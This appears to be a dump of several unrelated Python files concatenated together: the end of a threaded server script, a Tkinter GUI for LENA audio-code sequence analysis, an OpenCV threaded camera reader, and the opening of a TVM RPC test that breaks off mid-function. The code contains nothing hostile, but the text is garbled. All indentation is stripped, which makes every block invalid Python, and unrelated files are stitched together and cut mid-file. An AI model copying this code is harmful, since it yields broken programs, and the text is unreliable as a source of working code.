thread_client_status_updater = Thread(target = updateClientStatus, name = "ClientStatusUpdaterThread", args = (CLIENT_STATUS_UPDATER_INTERVAL, ))
thread_critical_watcher.daemon = True
try:
thread_critical_watcher.start()
thread_player_timing.start()
thread_main_server.start()
thread_controller_server.start()
thread_client_status_updater.start()
except:
for i in traceback.format_exc().split("\n"):
console.log("error").error(i)
# command binding
# format: [command: target function]
INPUT_BINDINGS = {"stop": stop,
"status": logStatus,
"list": listClients,
"ports": listPorts}
console.userInputMode(INPUT_BINDINGS)
|
LenaUI.py
|
"""
The MIT License (MIT)
Copyright (c) 2017 Paul Yoder, Joshua Wade, Kenneth Bailey, Mena Sargios, Joseph Hull, Loraina Lampley
Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
"""
import ttk, tkFileDialog
from Tkinter import *
from Batch import Batch
from SeqAnalysis2 import SeqAnalysis
import os
import platform
import threading
import time
import ast
import tkMessageBox
from Helpers import *
MAC = 'Darwin'
WINDOWS = 'Windows'
AB = 'A_B'
ABC = 'AB_C'
OK = 'ok'
MAXTHREADS = 4
codes = ('MAN','MAF','FAN','FAF','CHNSP','CHNNSP', \
'CHF','CXN','CXF','NON','NOF','OLN','OLF','TVN', \
'TVF','SIL')
codes_index = {'MAN':0,'MAF':1,'FAN':2,'FAF':3,'CHNSP':4,'CHNNSP':5, \
'CHF':6,'CXN':7,'CXF':8,'NON':9,'NOF':10,'OLN':11,'OLF':12,'TVN':13, \
'TVF':14,'SIL':15}
class LenaUI:
"This class is the UI and associated actions"
def __init__(self, root):
"UI started on init of class"
self.root = root
root.resizable(False, False)
root.title("LENA Contingencies")
# Class Attributes
self.its_file_dict = {} # k:ID v:path/to/file
self.input_dir = StringVar()
self.output_dir = StringVar()
self.output_format = []
self.seq_config = {}
self.pause_duration = DoubleVar()
self.pause_duration.set(0.1)
self.rounding_enabled = BooleanVar()
self.sequence_type = StringVar()
self.var_a = []
self.var_b = []
self.var_c = []
self.output_format.append(".csv") # set to csv default
self.output_msg = ""
self.output_msg_counter = 0
self.num_threads = IntVar()
self.num_threads.set(4)
self.start_time = None
self.seq_run_results = []
# Create main frames
main_frame = ttk.Frame(self.root) # top, mid, btm frames embedded within this frame
self.top_frame = ttk.Frame(main_frame, borderwidth=5, relief="sunken", width=200, height=150)
self.mid_frame = ttk.Frame(main_frame, borderwidth=5, relief="sunken", width=200, height=300)
self.btm_frame = ttk.Frame(main_frame, borderwidth=5, relief="sunken", width=200, height=100)
# create menu
menubar = Menu(root) # create menu bar
root.config(menu=menubar) # attach menubar to root window
# file menu
file_menu = Menu(menubar) # create "File" menu item
file_menu.add_command(label="Instructions", command=self.load_instruction_window) # add a command to "Help" menu item
file_menu.add_command(label="Change Thread Count", command=self.change_threads_window)
file_menu.add_command(label="Exit", command=self.close_program) # add a command to "File" menu item
menubar.add_cascade(label="File", menu=file_menu) # attach "File" menu item to menubar
# setup main frames to grid
# top, mid, btm frames laid out inside main_frame
# sticky tags used to keep UI elements together when stretched
main_frame.grid(row=0, column=0)
self.top_frame.grid(row=0, column=0, sticky=W+E+S+N)
self.mid_frame.grid(row=1, column=0, sticky=W+E+S+N)
self.btm_frame.grid(row=2, column=0, sticky=W+E+S+N)
# Setup Individual Frames
self.setup_top_frame()
self.setup_mid_frame()
self.setup_btm_frame()
# OSX ONLY - bring window to front
if platform.system() == MAC:
os.system('''/usr/bin/osascript -e 'tell app "Finder" to set frontmost of process "Python" to true' ''')
def change_threads_window(self):
"Window for changing the number of threads used by SequenceAnalysis"
# setup
t = Toplevel(self.root)
t.resizable(False, False)
# create widgets
top_frame = Frame(t, width=100, height=50)
t.wm_title("Set Threads")
l = Label(t, text="Set number of threads to use\nwhen performing analysis: \n(default=4)")
s = Spinbox(t, from_=4, to=50, textvariable=self.num_threads, width=4)
b = ttk.Button(t, text="close", command=lambda: t.destroy(), width=4)
# arrange widgets
l.grid(row=0, column=0, padx=5, pady=7)
s.grid(row=1, column=0, sticky=W, padx=15, pady=5)
b.grid(row=1,column=0, sticky=E, padx=15, pady=5)
def change_pause_duration_up(self, event):
"Updates(+.01) pause duration variable. Bound to mid_pause_up_btn."
if self.pause_duration.get() < 10.0:
self.pause_duration.set(round(self.pause_duration.get()+0.1,1))
def change_pause_duration_down(self, event):
"Updates(-.01) pause duration variable. Bound to mid_pause_dn_btn."
if self.pause_duration.get() >= 0.1:
self.pause_duration.set(round(self.pause_duration.get()-0.1,1))
def change_pause_duration_slider(self,event):
"Updates pause duration variable. Bound to mid_pause_slider."
self.pause_duration.set(round(self.pause_duration.get(),1))
def setup_top_frame(self):
"Configure top frame. Includes save, load, reset, input, output, and output selection(txt/csv/xlsx)."
# TOP FRAME CONFIG
# Create top frame widgets
self.csv_var = BooleanVar() # holds user selection for csv output
self.txt_var = BooleanVar() # holds user selection for txt output
self.xl_var = BooleanVar() # holds user selection for xlsx output
top_dir_label = ttk.Label(self.top_frame, text="Specify Directory")
top_reset_btn = ttk.Button(self.top_frame, text="RESET", command=self.reset_config)
top_load_btn = ttk.Button(self.top_frame, text="LOAD", command=self.load_config)
top_save_btn = ttk.Button(self.top_frame, text="SAVE", command=self.save_config)
top_input_label = ttk.Label(self.top_frame, text="Input:")
top_output_label = ttk.Label(self.top_frame, text="Output:")
top_format_label = ttk.Label(self.top_frame, text="Output Format")
self.top_csv_btn = ttk.Checkbutton(self.top_frame, text='.csv', command=self.set_output_var, variable=self.csv_var,onvalue=1, offvalue=0)
self.csv_var.set(1) # set to csv default
self.top_txt_btn = ttk.Checkbutton(self.top_frame, text=".txt", command=self.set_output_var, variable=self.txt_var,onvalue=1, offvalue=0)
self.top_xl_btn = ttk.Checkbutton(self.top_frame, text=".xlsx", command=self.set_output_var, variable=self.xl_var,onvalue=1, offvalue=0)
top_filler = ttk.Label(self.top_frame, text=" ")
top_in_browse_btn = ttk.Button(self.top_frame, text="Browse...", command=self.select_input_dir) #Browse button for input directory //J
top_out_browse_btn = ttk.Button(self.top_frame, text="Browse...", command=self.select_output_dir) #Browse button for output directory //J
self.top_in_path = Entry(self.top_frame, width=20, textvariable=self.input_dir, state=DISABLED) #create the label to display input directory path //J
self.top_out_path = Entry(self.top_frame, width=20, textvariable=self.output_dir, state=DISABLED) #create the label to display output directory path //J
# setup top frame widgets
top_reset_btn.grid(row=0, column=3, sticky=E)
top_dir_label.grid(row=1, column=0, columnspan=2, sticky=N)
top_input_label.grid(row=2, column=0, sticky=E)
top_output_label.grid(row=3, column=0, sticky=E)
top_in_browse_btn.grid(row=2, column=3) #
top_out_browse_btn.grid(row=3, column=3)#
self.top_in_path.grid(row=2, column=1, columnspan=2) #
self.top_out_path.grid(row=3, column=1, columnspan=2)#
top_format_label.grid(row=5, column=0, columnspan=2)
top_filler.grid(row=4, column=0)
self.top_csv_btn.grid(row=6, column=0)
self.top_txt_btn.grid(row=6, column=1)
self.top_xl_btn.grid(row=6, column=2)
top_load_btn.grid(row=0, column=2)
top_save_btn.grid(row=0, column=1)
def change_abc_var(self, event):
"Updates var_a, var_b, or var_c. Bound to mid_abc_a_box, mid_abc_b_box, and mid_abc_a_box."
# get user selection; id -> value
selection = event.widget.curselection()
templist = []
for sel in selection:
templist.append(event.widget.get(sel))
# assign to appropriate var_
if (event.widget == self.mid_abc_a_box):
self.var_a = templist
print("A: "+str(self.var_a))
elif (event.widget == self.mid_abc_b_box):
self.var_b = templist
print("B: "+str(self.var_b))
elif (event.widget == self.mid_abc_c_box):
self.var_c = templist
print("C: "+str(self.var_c))
def setup_mid_frame(self):
"Configure mid frame. Includes sequence type selection and variable selection(a,b,c)."
# MID FRAME CONFIG
# create mid frame widgets
code_vars = StringVar(value=codes)
self.mid_abc_a_box = Listbox(self.mid_frame, height=16, listvariable=code_vars, selectmode=MULTIPLE, width=9, exportselection=False)
self.mid_abc_b_box = Listbox(self.mid_frame, height=16, listvariable=code_vars, selectmode=MULTIPLE, width=9, exportselection=False)
self.mid_abc_c_box = Listbox(self.mid_frame, height=16, listvariable=code_vars, selectmode=MULTIPLE, width=9, exportselection=False)
self.mid_abc_a_box.bind("<<ListboxSelect>>", self.change_abc_var)
self.mid_abc_b_box.bind("<<ListboxSelect>>", self.change_abc_var)
self.mid_abc_c_box.bind("<<ListboxSelect>>", self.change_abc_var)
def disable_c():
self.mid_abc_c_box.configure(state="disable")
self.mid_abc_c_box.update()
def enable_c():
self.mid_abc_c_box.configure(state="normal")
self.mid_abc_c_box.update()
mid_type_label = ttk.Label(self.mid_frame, text='Type of Analysis')
self.mid_ab_btn = ttk.Radiobutton(self.mid_frame, text='A ---> B', variable=self.sequence_type, value=AB, command=disable_c)
self.mid_abc_btn = ttk.Radiobutton(self.mid_frame, text='( A ---> B ) ---> C', variable=self.sequence_type, value=ABC, command=enable_c)
mid_filler_label = ttk.Label(self.mid_frame, text=" ")
mid_conf_label = ttk.Label(self.mid_frame, text="Configure Analysis")
mid_conf_abc_a_label = ttk.Label(self.mid_frame, text="A")
mid_conf_abc_b_label = ttk.Label(self.mid_frame, text="B")
mid_conf_abc_c_label = ttk.Label(self.mid_frame, text="C")
mid_filler_label2 = ttk.Label(self.mid_frame, text=" ")
mid_pause_label = ttk.Label(self.mid_frame, text="Pause Duration")
mid_filler_label3 = ttk.Label(self.mid_frame, text=" ")
self.mid_pause_slider = ttk.Scale(self.mid_frame, orient=HORIZONTAL, length=100, from_=0.0, to=10.0, variable=self.pause_duration,command=lambda r: self.change_pause_duration_slider(self))
mid_pause_dn_btn = ttk.Button(self.mid_frame, text="<", command=lambda: self.change_pause_duration_down(self), width=1)
mid_pause_up_btn = ttk.Button(self.mid_frame, text=">", command=lambda: self.change_pause_duration_up(self), width=1)
self.mid_pause_entry = ttk.Entry(self.mid_frame, textvariable=self.pause_duration, width=4)
self.mid_pause_checkbox = ttk.Checkbutton(self.mid_frame, text="Enable rounding", variable=self.rounding_enabled,onvalue=True, offvalue=False)
# setup mid frame widgets
mid_type_label.grid(row=0, column=0, columnspan=4)
self.mid_ab_btn.grid(row=1, column=0, columnspan=3, sticky = W)
self.mid_abc_btn.grid(row=2, column=0, columnspan=3, sticky = W)
mid_conf_abc_a_label.grid(row=3, column=0)
mid_conf_abc_b_label.grid(row=3, column=1)
mid_conf_abc_c_label.grid(row=3, column=2)
self.mid_abc_a_box.grid(row=4, column=0)
self.mid_abc_b_box.grid(row=4, column=1)
self.mid_abc_c_box.grid(row=4, column=2)
mid_filler_label3.grid(row=5, column=0, columnspan=3)
mid_pause_label.grid(row=6, column=0, columnspan=4, pady=5)
self.mid_pause_entry.grid(row=7, column=0)
self.mid_pause_slider.grid(row=7, column=1, sticky=W)
mid_pause_dn_btn.grid(row=7, column=2, sticky=E)
mid_pause_up_btn.grid(row=7, column=3, sticky=W)
self.mid_pause_checkbox.grid(row=8, column=0, pady=4, columnspan=4)
def setup_btm_frame(self):
"Configure bottom frame. Inlcudes progress bar, submit/cancel button, and message window."
# BOTTOM FRAME CONFIG
# create bottom frame widgets
self.btm_submit_btn = ttk.Button(self.btm_frame, text="Submit", command=self.start_analysis)
self.btm_progress_bar = ttk.Progressbar(self.btm_frame, orient=HORIZONTAL, length=170, mode='indeterminate')
self.btm_text_window = None
if platform.system() == MAC:
self.btm_text_window = Text(self.btm_frame, width=45, height=5)
elif platform.system() == WINDOWS:
self.btm_text_window = Text(self.btm_frame, width=34, height=5)
self.btm_text_window.config(state=DISABLED)
# arrange bottom frame widgets
self.btm_submit_btn.grid(row=0, column=0, sticky=E)
self.btm_progress_bar.grid(row=0, column=0, sticky=W)
self.btm_text_window.grid(row=1, column=0, columnspan=1)
def select_input_dir(self):
"Updates input_dir variable. Bound to top_in_browse_btn."
input_dir = tkFileDialog.askdirectory()
if input_dir:
self.input_dir.set(input_dir)
def select_output_dir(self):
"Updates output_dir variable. Bound to top_out_browse_btn."
output_dir = tkFileDialog.askdirectory()
if output_dir:
self.output_dir.set(output_dir)
def get_its_files(self):
"This method looks creates a dict of all .its files found in the input directory"
tempDict = Batch(self.input_dir.get())
for i in range(len(tempDict.items)):
tempItem = tempDict.items.popitem()
self.its_file_dict.update({tempItem[0]:tempItem[1][0]})
def check_config(self):
"This method checks if all seq_config values are set. Returns error message if any aren't set."
# check input directory
if len(str(self.top_in_path.get())) < 2:
return "Input directory not set! "
# check output directory
if len(str(self.top_out_path.get())) < 2:
return "Output directory not set! "
# check sequence_type
if str(self.sequence_type.get()) not in (AB, ABC):
return "Sequence Type not set! "
# check var_a
if not self.var_a:
return "A is not set! "
# check var_b
if not self.var_b:
return "B is not set! "
# check var_c
if (self.sequence_type.get() == ABC):
if not self.var_c:
return "C is not set! "
# check output_format
if not self.output_format:
return "Output format not set! "
else:
self.write_to_window("All config options are valid!")
return OK
def set_config(self):
"This method sets the self.seq_config variable - returns True if successful, False if unsuccessful"
# check if config options set
errorVal = self.check_config()
if errorVal != OK:
self.write_to_window(errorVal)
return False
# all config options set, so fill self.seq_config
self.seq_config['batDir'] = self.top_in_path.get()
self.seq_config['A'] = ','.join(map(str, self.var_a))
self.seq_config['B'] = ','.join(map(str, self.var_b))
self.seq_config['C'] = ','.join(map(str, self.var_c))
self.seq_config['outputContent'] = ""
self.seq_config['roundingEnabled'] = str(self.rounding_enabled.get())
self.seq_config['P'] = 'Pause'
self.seq_config['outputDirPath'] = self.top_out_path.get()
self.seq_config['seqType'] = self.sequence_type.get()
self.seq_config['PauseDur'] = str(round(self.pause_duration.get(), 1))
self.seq_config['outputTypes'] = ''.join(self.output_format)
self.write_to_window("Config options assembled!")
return True
def kill_threads(self):
"Sends stop message to all threads and updates UI."
# set stopper - threads will close
self.stopper.set()
# update UI
self.btm_submit_btn.configure(text="Submit", command=self.start_analysis)
#self.enable_widgets()
self.btm_progress_bar.stop()
def watch_status(self):
"This method watches for analysis finish or user cancel. Started after pressing the submit button, but not before checking+setting seq_config."
while True:
if len(self.seq_run_results) > 0:
# configure UI
self.btm_submit_btn.configure(text="Submit", command=self.start_analysis)
#self.enable_widgets()
self.btm_progress_bar.stop()
self.write_to_window(self.seq_run_results[0] + " Ran in "+str(round(time.time()-self.start_time,2))+"s")
# reset check var
self.seq_run_results = []
self.stopper = None
break
elif self.stopper.is_set():
# alert user
self.write_to_window("Analysis Cancelled!")
# reset check var
self.seq_run_results = []
self.stopper = None
break
def start_analysis(self):
"Starts run_seqanalysis thread. run_seqanalysis needs to be run as a thread so we don't interrupt the main UI thread."
# setup
self.stopper = threading.Event()
self.btm_submit_btn.configure(state=DISABLED)
# start analysis thread
t = threading.Thread(target=self.run_seqanalysis)
t.daemon = True
t.start()
def run_seqanalysis(self):
"This method performs the sequence analysis on all .its files"
# setup
self.start_time = time.time()
#self.disable_widgets()
self.btm_progress_bar.start()
# check config
start = time.time()
r = self.set_config()
if r != True:
# set_config already output to window
self.btm_submit_btn.configure(text="Submit", command=self.start_analysis)
self.btm_submit_btn.configure(state='enable')
self.btm_progress_bar.stop()
#self.enable_widgets()
return
# retrieve .its files
self.get_its_files()
if len(self.its_file_dict) < 1:
self.write_to_window("No .its files in input directory!")
self.btm_submit_btn.configure(text="Submit", command=self.start_analysis)
self.btm_submit_btn.configure(state='enable')
self.btm_progress_bar.stop()
#self.enable_widgets()
return
# start watcher thread
th = threading.Thread(target=self.watch_status)
th.daemon = True
th.start()
# enable cancel button
self.btm_submit_btn.configure(state='enable')
self.btm_submit_btn.configure(text="Cancel", command=self.kill_threads)
# create object to send to analysis
data = SeqData(self.its_file_dict, self.seq_config, self.num_threads.get(), self.output_format)
self.seq_run_results = []
# kick off analysis
thread = threading.Thread(target=SeqAnalysis, args=(data,self.seq_run_results, self.stopper))
thread.daemon = True
thread.start()
def load_config(self):
"This method loads a config file for the program"
# file dialog - select file
config_load_file = tkFileDialog.askopenfilename(initialdir="/", title="Select config file", filetypes=(("leco files", "*.leco"), ("all files", "*.*")))
if not str(config_load_file).endswith('.leco'):
return
print("Loaded File")
# open file
new_config = None
try:
open_file = open(config_load_file, 'r')
new_config = ast.literal_eval(open_file.read())
assert type(new_config) is dict
open_file.close()
except:
self.write_to_window("Failed to Load File!")
return
print("Loaded file to config")
# check contents
try:
# check batDir
if(len(new_config['batDir']) < 2):
raise Exception("batDir invalid")
# check outputDir
if(len(new_config['outputDirPath']) < 2):
raise Exception("Invalid outputDirPath!")
# check SeqType
if new_config['seqType'] == AB:
pass
elif new_config['seqType'] == ABC:
pass
else:
raise Exception("seqType Invalid")
# check A
if not any(x in codes for x in new_config['A'].split(',')):
raise Exception("Invalid Var A")
# check B
if not any(x in codes for x in new_config['B'].split(',')):
raise Exception("Invalid Var B")
# check C
if(new_config['seqType'] == ABC):
if not any(x in codes for x in new_config['C'].split(',')):
raise Exception("Invalid Var C")
# check rounding enabled
if new_config['roundingEnabled'] == 'True':
pass
elif new_config['roundingEnabled'] == 'False':
pass
else:
raise Exception("Invalid roundingEnabled!")
# check pause
#if(new_config['Pause'] != 'Pause'):
# raise Exception("Invalid P")
# check pause duration
if(float(new_config['PauseDur']) < 0.1 ):
raise Exception("Invalid pause duration!")
# check output formats
if not any(x in new_config['outputTypes'] for x in ['csv', 'xlsx', 'txt']):
raise Exception("Invalid output types!")
except Exception as e:
self.write_to_window("FAILURE! Invalid file contents!")
print(repr(e))
return
print("Config contents checked")
# fill contents to program
self.reset_config()
## Fill Vars + seqConfig
try:
self.seq_config['batDir'] = new_config['batDir']
self.seq_config['A'] = new_config['A']
self.seq_config['B'] = new_config['B']
self.seq_config['C'] = new_config['C']
self.seq_config['roundingEnabled'] = new_config['roundingEnabled']
self.seq_config['outputDirPath'] = new_config['outputDirPath']
self.seq_config['seqType'] = new_config['seqType']
self.seq_config['PauseDur'] = new_config['PauseDur']
self.seq_config['outputTypes'] = new_config['outputTypes']
self.output_format = []
if 'xlsx' in new_config['outputTypes']:
self.output_format.append(".xlsx")
if 'csv' in new_config['outputTypes']:
self.output_format.append(".csv")
if 'txt' in new_config['outputTypes']:
self.output_format.append(".txt")
self.seq_config['outputContent'] = ""
self.seq_config['P'] = 'Pause'
print("Program variables filled")
except Exception as e:
#self.write_to_window("")
print(repr(e))
return
## Fill Widgets
try:
# input and output
self.input_dir.set(new_config['batDir'])
self.output_dir.set(new_config['outputDirPath'])
# output formats
if 'txt' in new_config['outputTypes']:
self.txt_var.set(1)
else:
self.txt_var.set(0)
if 'csv' in new_config['outputTypes']:
self.csv_var.set(1)
else:
self.csv_var.set(0)
if 'xlsx' in new_config['outputTypes']:
self.xl_var.set(1)
else:
self.xl_var.set(0)
# sequence type
self.sequence_type.set(new_config['seqType'])
# var_a/b/c
#self.mid_abc_a_box
var_a_list = new_config['A'].split(',')
for item in var_a_list:
self.mid_abc_a_box.selection_set(codes_index[item])
self.var_a.append(item)
#self.mid_abc_b_box
var_b_list = new_config['B'].split(',')
for item in var_b_list:
self.mid_abc_b_box.select_set(codes_index[item])
self.var_b.append(item)
#self.mid_abc_c_box
if new_config['seqType'] == ABC:
var_c_list = new_config['C'].split(',')
for item in var_c_list:
self.mid_abc_c_box.select_set(codes_index[item])
self.var_c.append(item)
else:
self.mid_abc_c_box.configure(state="disable")
self.mid_abc_c_box.update()
# pause duration
self.pause_duration.set(float(new_config['PauseDur']))
# rounding enabled
if new_config['roundingEnabled'] == 'True':
self.rounding_enabled.set(True)
except Exception as e:
print(repr(e))
print("FAILED TO FILL WIDGETS ON LOAD!")
print("Program Widgets filled")
# write results to screen
self.write_to_window("Successfully Loaded config file!")
def reset_config(self):
"This method resets the all program options"
# re-initialize key variables used in the UI
self.input_dir = StringVar()
self.output_dir = StringVar()
self.sequence_type = StringVar()
self.pause_duration = DoubleVar()
self.pause_duration.set(0.1)
# re-initialize the A, B, & C entry boxes
self.mid_abc_a_box.select_clear(0,END)
self.mid_abc_b_box.select_clear(0,END)
self.mid_abc_c_box.select_clear(0,END)
self.var_a = []
self.var_b = []
self.var_c = []
# re-initialize the selections
self.output_format = []
self.output_format.append(".csv")
self.csv_var.set(1)
self.txt_var.set(0)
self.xl_var.set(0)
self.rounding_enabled.set(0)
# re-initialize the selections update
self.top_csv_btn.configure(variable=self.csv_var)
self.top_txt_btn.configure(variable=self.txt_var)
self.top_xl_btn.configure(variable=self.xl_var)
self.mid_pause_checkbox.configure(variable=self.rounding_enabled)
self.top_csv_btn.update()
self.top_txt_btn.update()
self.top_xl_btn.update()
self.mid_pause_checkbox.update()
# reset the in and out dir update
self.top_in_path.configure(textvariable=self.input_dir)
self.top_out_path.configure(textvariable=self.output_dir)
self.top_in_path.update()
self.top_out_path.update()
# reset the selection to nothing selected update
self.mid_ab_btn.configure(variable=self.sequence_type)
self.mid_abc_btn.configure(variable=self.sequence_type)
self.mid_ab_btn.update()
self.mid_abc_btn.update()
# reset slider and pause_duration entry box update
self.mid_pause_slider.configure(variable=self.pause_duration)
self.mid_pause_entry.configure(textvariable=self.pause_duration)
self.mid_pause_slider.update()
self.mid_pause_entry.update()
def save_config(self):
"This method allows the user to save the program's current configuration"
if self.check_config() == OK:
self.set_config()
config_save_file = tkFileDialog.asksaveasfile(mode='w', defaultextension=".leco")
seq_config_string = str(self.seq_config)
config_save_file.write(seq_config_string)
self.write_to_window("Configuration successfully saved! ")
else:
self.write_to_window("Unfilled configuration options!")
def load_instruction_window(self):
"This method loads a separate window with program instructions"
instruction_var = self.list_instructions()
tkMessageBox.showinfo("Instructions",self.list_instructions())
def close_program(self):
"This method closes the program"
self.root.quit()
def write_to_window(self, message):
"This method writes text to message box"
# edit message text
self.output_msg_counter += 1
message = str(self.output_msg_counter)+": "+message +'\n'
self.output_msg = message + self.output_msg
# insert text
# we must enable window to edit contents
self.btm_text_window.config(state=NORMAL)
self.btm_text_window.delete(1.0,END)
self.btm_text_window.insert(END, self.output_msg)
self.btm_text_window.config(state=DISABLED)
def set_output_var(self):
"This method sets the output var based on the user's selection"
if self.csv_var.get() == 1:
if ".csv" not in self.output_format:
self.output_format.append(".csv")
elif self.csv_var.get() == 0:
if ".csv" in self.output_format:
self.output_format.remove(".csv")
if self.xl_var.get() == 1:
if ".xlsx" not in self.output_format:
self.output_format.append(".xlsx")
elif self.xl_var.get() == 0:
if ".xlsx" in self.output_format:
self.output_format.remove(".xlsx")
if self.txt_var.get() == 1:
if ".txt" not in self.output_format:
self.output_format.append(".txt")
elif self.txt_var.get() == 0:
if ".txt" in self.output_format:
self.output_format.remove(".txt")
def disable_widgets(self):
"This method disables top and mid widgets"
for child in self.top_frame.winfo_children():
try:
child.configure(state=DISABLED)
except:
pass
for child in self.mid_frame.winfo_children():
try:
child.configure(state=DISABLED)
except:
pass
def enable_widgets(self):
"This method enables top and mid widgets"
for child in self.top_frame.winfo_children():
try:
child.configure(state='normal')
except:
pass
for child in self.mid_frame.winfo_children():
try:
child.configure(state='normal')
except:
pass
# Listbox reset
self.mid_abc_a_box.configure(state="normal")
self.mid_abc_a_box.update()
self.mid_abc_b_box.configure(state="normal")
self.mid_abc_b_box.update()
self.mid_abc_c_box.configure(state="normal")
self.mid_abc_c_box.update()
# conditional seqType
if self.sequence_type.get() == AB:
self.mid_abc_c_box.configure(state="disable")
self.mid_abc_c_box.update()
def list_instructions(self):
instruction_var = "1) SAVE: Saves all the data currently in all fields.\n"
instruction_var += "2) LOAD: Loads the data last saved in all fields.\n"
instruction_var += "3) RESET: Empties all fields\n"
instruction_var += "4) INPUT: Browse to the directory that contains all files for analysis\n"
instruction_var += "5) OUTPUT: Browse to the desired directory for the output file\n"
instruction_var += "6) OUTPUT FORMAT: Select the desired format for output file\n"
instruction_var += "7) TYPE OF ANALYSIS: Choose the type of analysis to be done and its variables\n"
instruction_var += "\tA--->B or (A---> B)---> C: type of analysis performed\n"
instruction_var += "\tA, B, C: Drop down menus to select desired variables\n\n"
instruction_var += "8) PAUSE DURATION: Use entry field, slider bar, and/or buttons to choose pause duration\n"
instruction_var += "\tEntry field: enter in specific pause duration\n"
instruction_var += "\tSlider bar: Click and hold to move along bar\n"
instruction_var += "\tButtons(<,>): Moves slider bar by .1 in specified direction\n\n"
instruction_var += "9) ENABLE ROUNDING: Select to enable rouding\n"
instruction_var += "10) SUBMIT: Submits the current data in fields to the program to start analysis\n"
return instruction_var
|
camgear.py
|
# import the necessary packages
from threading import Thread
from pkg_resources import parse_version
import re
#Note: Remember, Not all parameters are supported by all cameras which is
#one of the most troublesome part of the OpenCV library. Each camera type,
#from android cameras to USB cameras to professional
#ones offer a different interface to modify its parameters.
#Therefore there are many branches in OpenCV code to support
#as many of them, but of course not all possible devices
#are covered and thereby works.
#To check parameter values supported by your webcam, you can hook your camera
#to your Linux machine and use command `v4l2-ctl -d 0 --list-formats-ext` (where 0 is index of given camera)
#to list the supported video parameters and their values.
try:
# import OpenCV Binaries
import cv2
# check whether OpenCV Binaries are 3.x+
if parse_version(cv2.__version__) >= parse_version('3'):
pass
else:
raise ImportError('OpenCV library version >= 3.0 is only supported by this library')
except ImportError as error:
raise ImportError('Failed to detect OpenCV executables, install it with "pip install opencv-python" command.')
class CamGear:
"""This class targets any common IP or USB Cameras(including Raspberry Pi Compatible),
Various Video Files Formats and Network Video Streams(Including Gstreamer Raw Video Capture Pipeline)
for obtaining high-speed real-time frames by utilizing OpenCV and multi-threading."""
def __init__(self, source = 0, logging = False, time_delay = 0, **options):
# initialize the camera stream and read the first frame
self.stream = cv2.VideoCapture(source)
try:
# try to apply attributes to source if specified
for key, value in options.items():
self.stream.set(self.capPropId(key.strip()),value)
except Exception as e:
# Catch if any error occurred
if logging:
print(e)
(self.grabbed, self.frame) = self.stream.read()
# applying time delay to warm-up webcam only if specified
if time_delay:
import time
time.sleep(time_delay)
# thread initialization
self.thread=None
# initialize termination flag
self.terminate = False
def start(self):
# start the thread to read frames from the video stream
self.thread = Thread(target=self.update, args=())
self.thread.daemon = True
self.thread.start()
return self
def capPropId(self, property):
#Retrieves the Property's Integer(Actual) value.
return getattr(cv2, property)
def update(self):
# keep looping infinitely until the thread is terminated
while True:
# if the thread indicator variable is set, stop the thread
if self.terminate:
break
# otherwise, read the next frame from the stream
(self.grabbed, self.frame) = self.stream.read()
#check for valid frames
if not self.grabbed:
#no frames received, then safely exit
self.terminate = True
#release resources
self.stream.release()
def read(self):
# return the frame most recently read
return self.frame
def stop(self):
# indicate that the thread should be terminate
self.terminate = True
# wait until stream resources are released (producer thread might be still grabbing frame)
if self.thread is not None:
self.thread.join()
#properly handle thread exit
|
test_runtime_rpc.py
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import tvm
from tvm import te
import tvm.testing
import logging
import multiprocessing
import os
import stat
import sys
import time
import pytest
import numpy as np
from tvm import rpc
from tvm.contrib import utils, cc
from tvm.rpc.tracker import Tracker
if __name__ == "__main__":
# NOTE: must live here to avoid registering PackedFunc with libtvm.so twice.
sys.exit(pytest.main([__file__] + sys.argv[1:]))
# tkonolige: The issue as I understand it is this: multiprocessing's spawn
# method launches a new process and then imports the relevant modules. This
# means that all registered functions must exist at the top level scope. In
# this file they are, so all is well when we run this file directly.
# However, when run under pytest, the functions aren't registered on the
# server. I believe this is because pytest is also using multiprocessing to
# run individual functions. Somewhere along the way, the imports are being
# lost, so the server ends up not registering the functions.
pytestmark = pytest.mark.skipif(
# Windows does not support fork so we can enable Windows for testing
sys.platform.startswith("win") == False and multiprocessing.get_start_method() != "fork",
reason=(
"pytest + multiprocessing spawn method causes tvm.register_func to "
"not work on the rpc.Server."
),
)
@tvm.testing.requires_rpc
def test_bigendian_rpc():
"""Test big endian rpc when there is a PowerPC RPC server available"""
host = os.environ.get("TVM_POWERPC_TEST_HOST", None)
port = os.environ.get("TVM_POWERPC_TEST_PORT", 9090)
if host is None:
return
def verify_rpc(remote, target, shape, dtype):
A = te.placeholder(shape, dtype=dtype)
B = te.compute(A.shape, lambda i: A[i] + tvm.tir.const(1, A.dtype))
s = te.create_schedule(B.op)
f = tvm.build(s, [A, B], target, name="myadd")
dev = remote.cpu(0)
a = tvm.nd.array(np.random.randint(0, 256, size=shape).astype(A.dtype), device=dev)
b = tvm.nd.array(np.zeros(shape).astype(A.dtype), device=dev)
temp = utils.tempdir()
path_dso = temp.relpath("dev_lib.o")
f.save(path_dso)
remote.upload(path_dso)
f = remote.load_module("dev_lib.o")
f(a, b)
tvm.testing.assert_allclose(a.numpy() + 1, b.numpy())
print("Test RPC connection to PowerPC...")
remote = rpc.connect(host, port)
target = "llvm -mtriple=powerpc-linux-gnu"
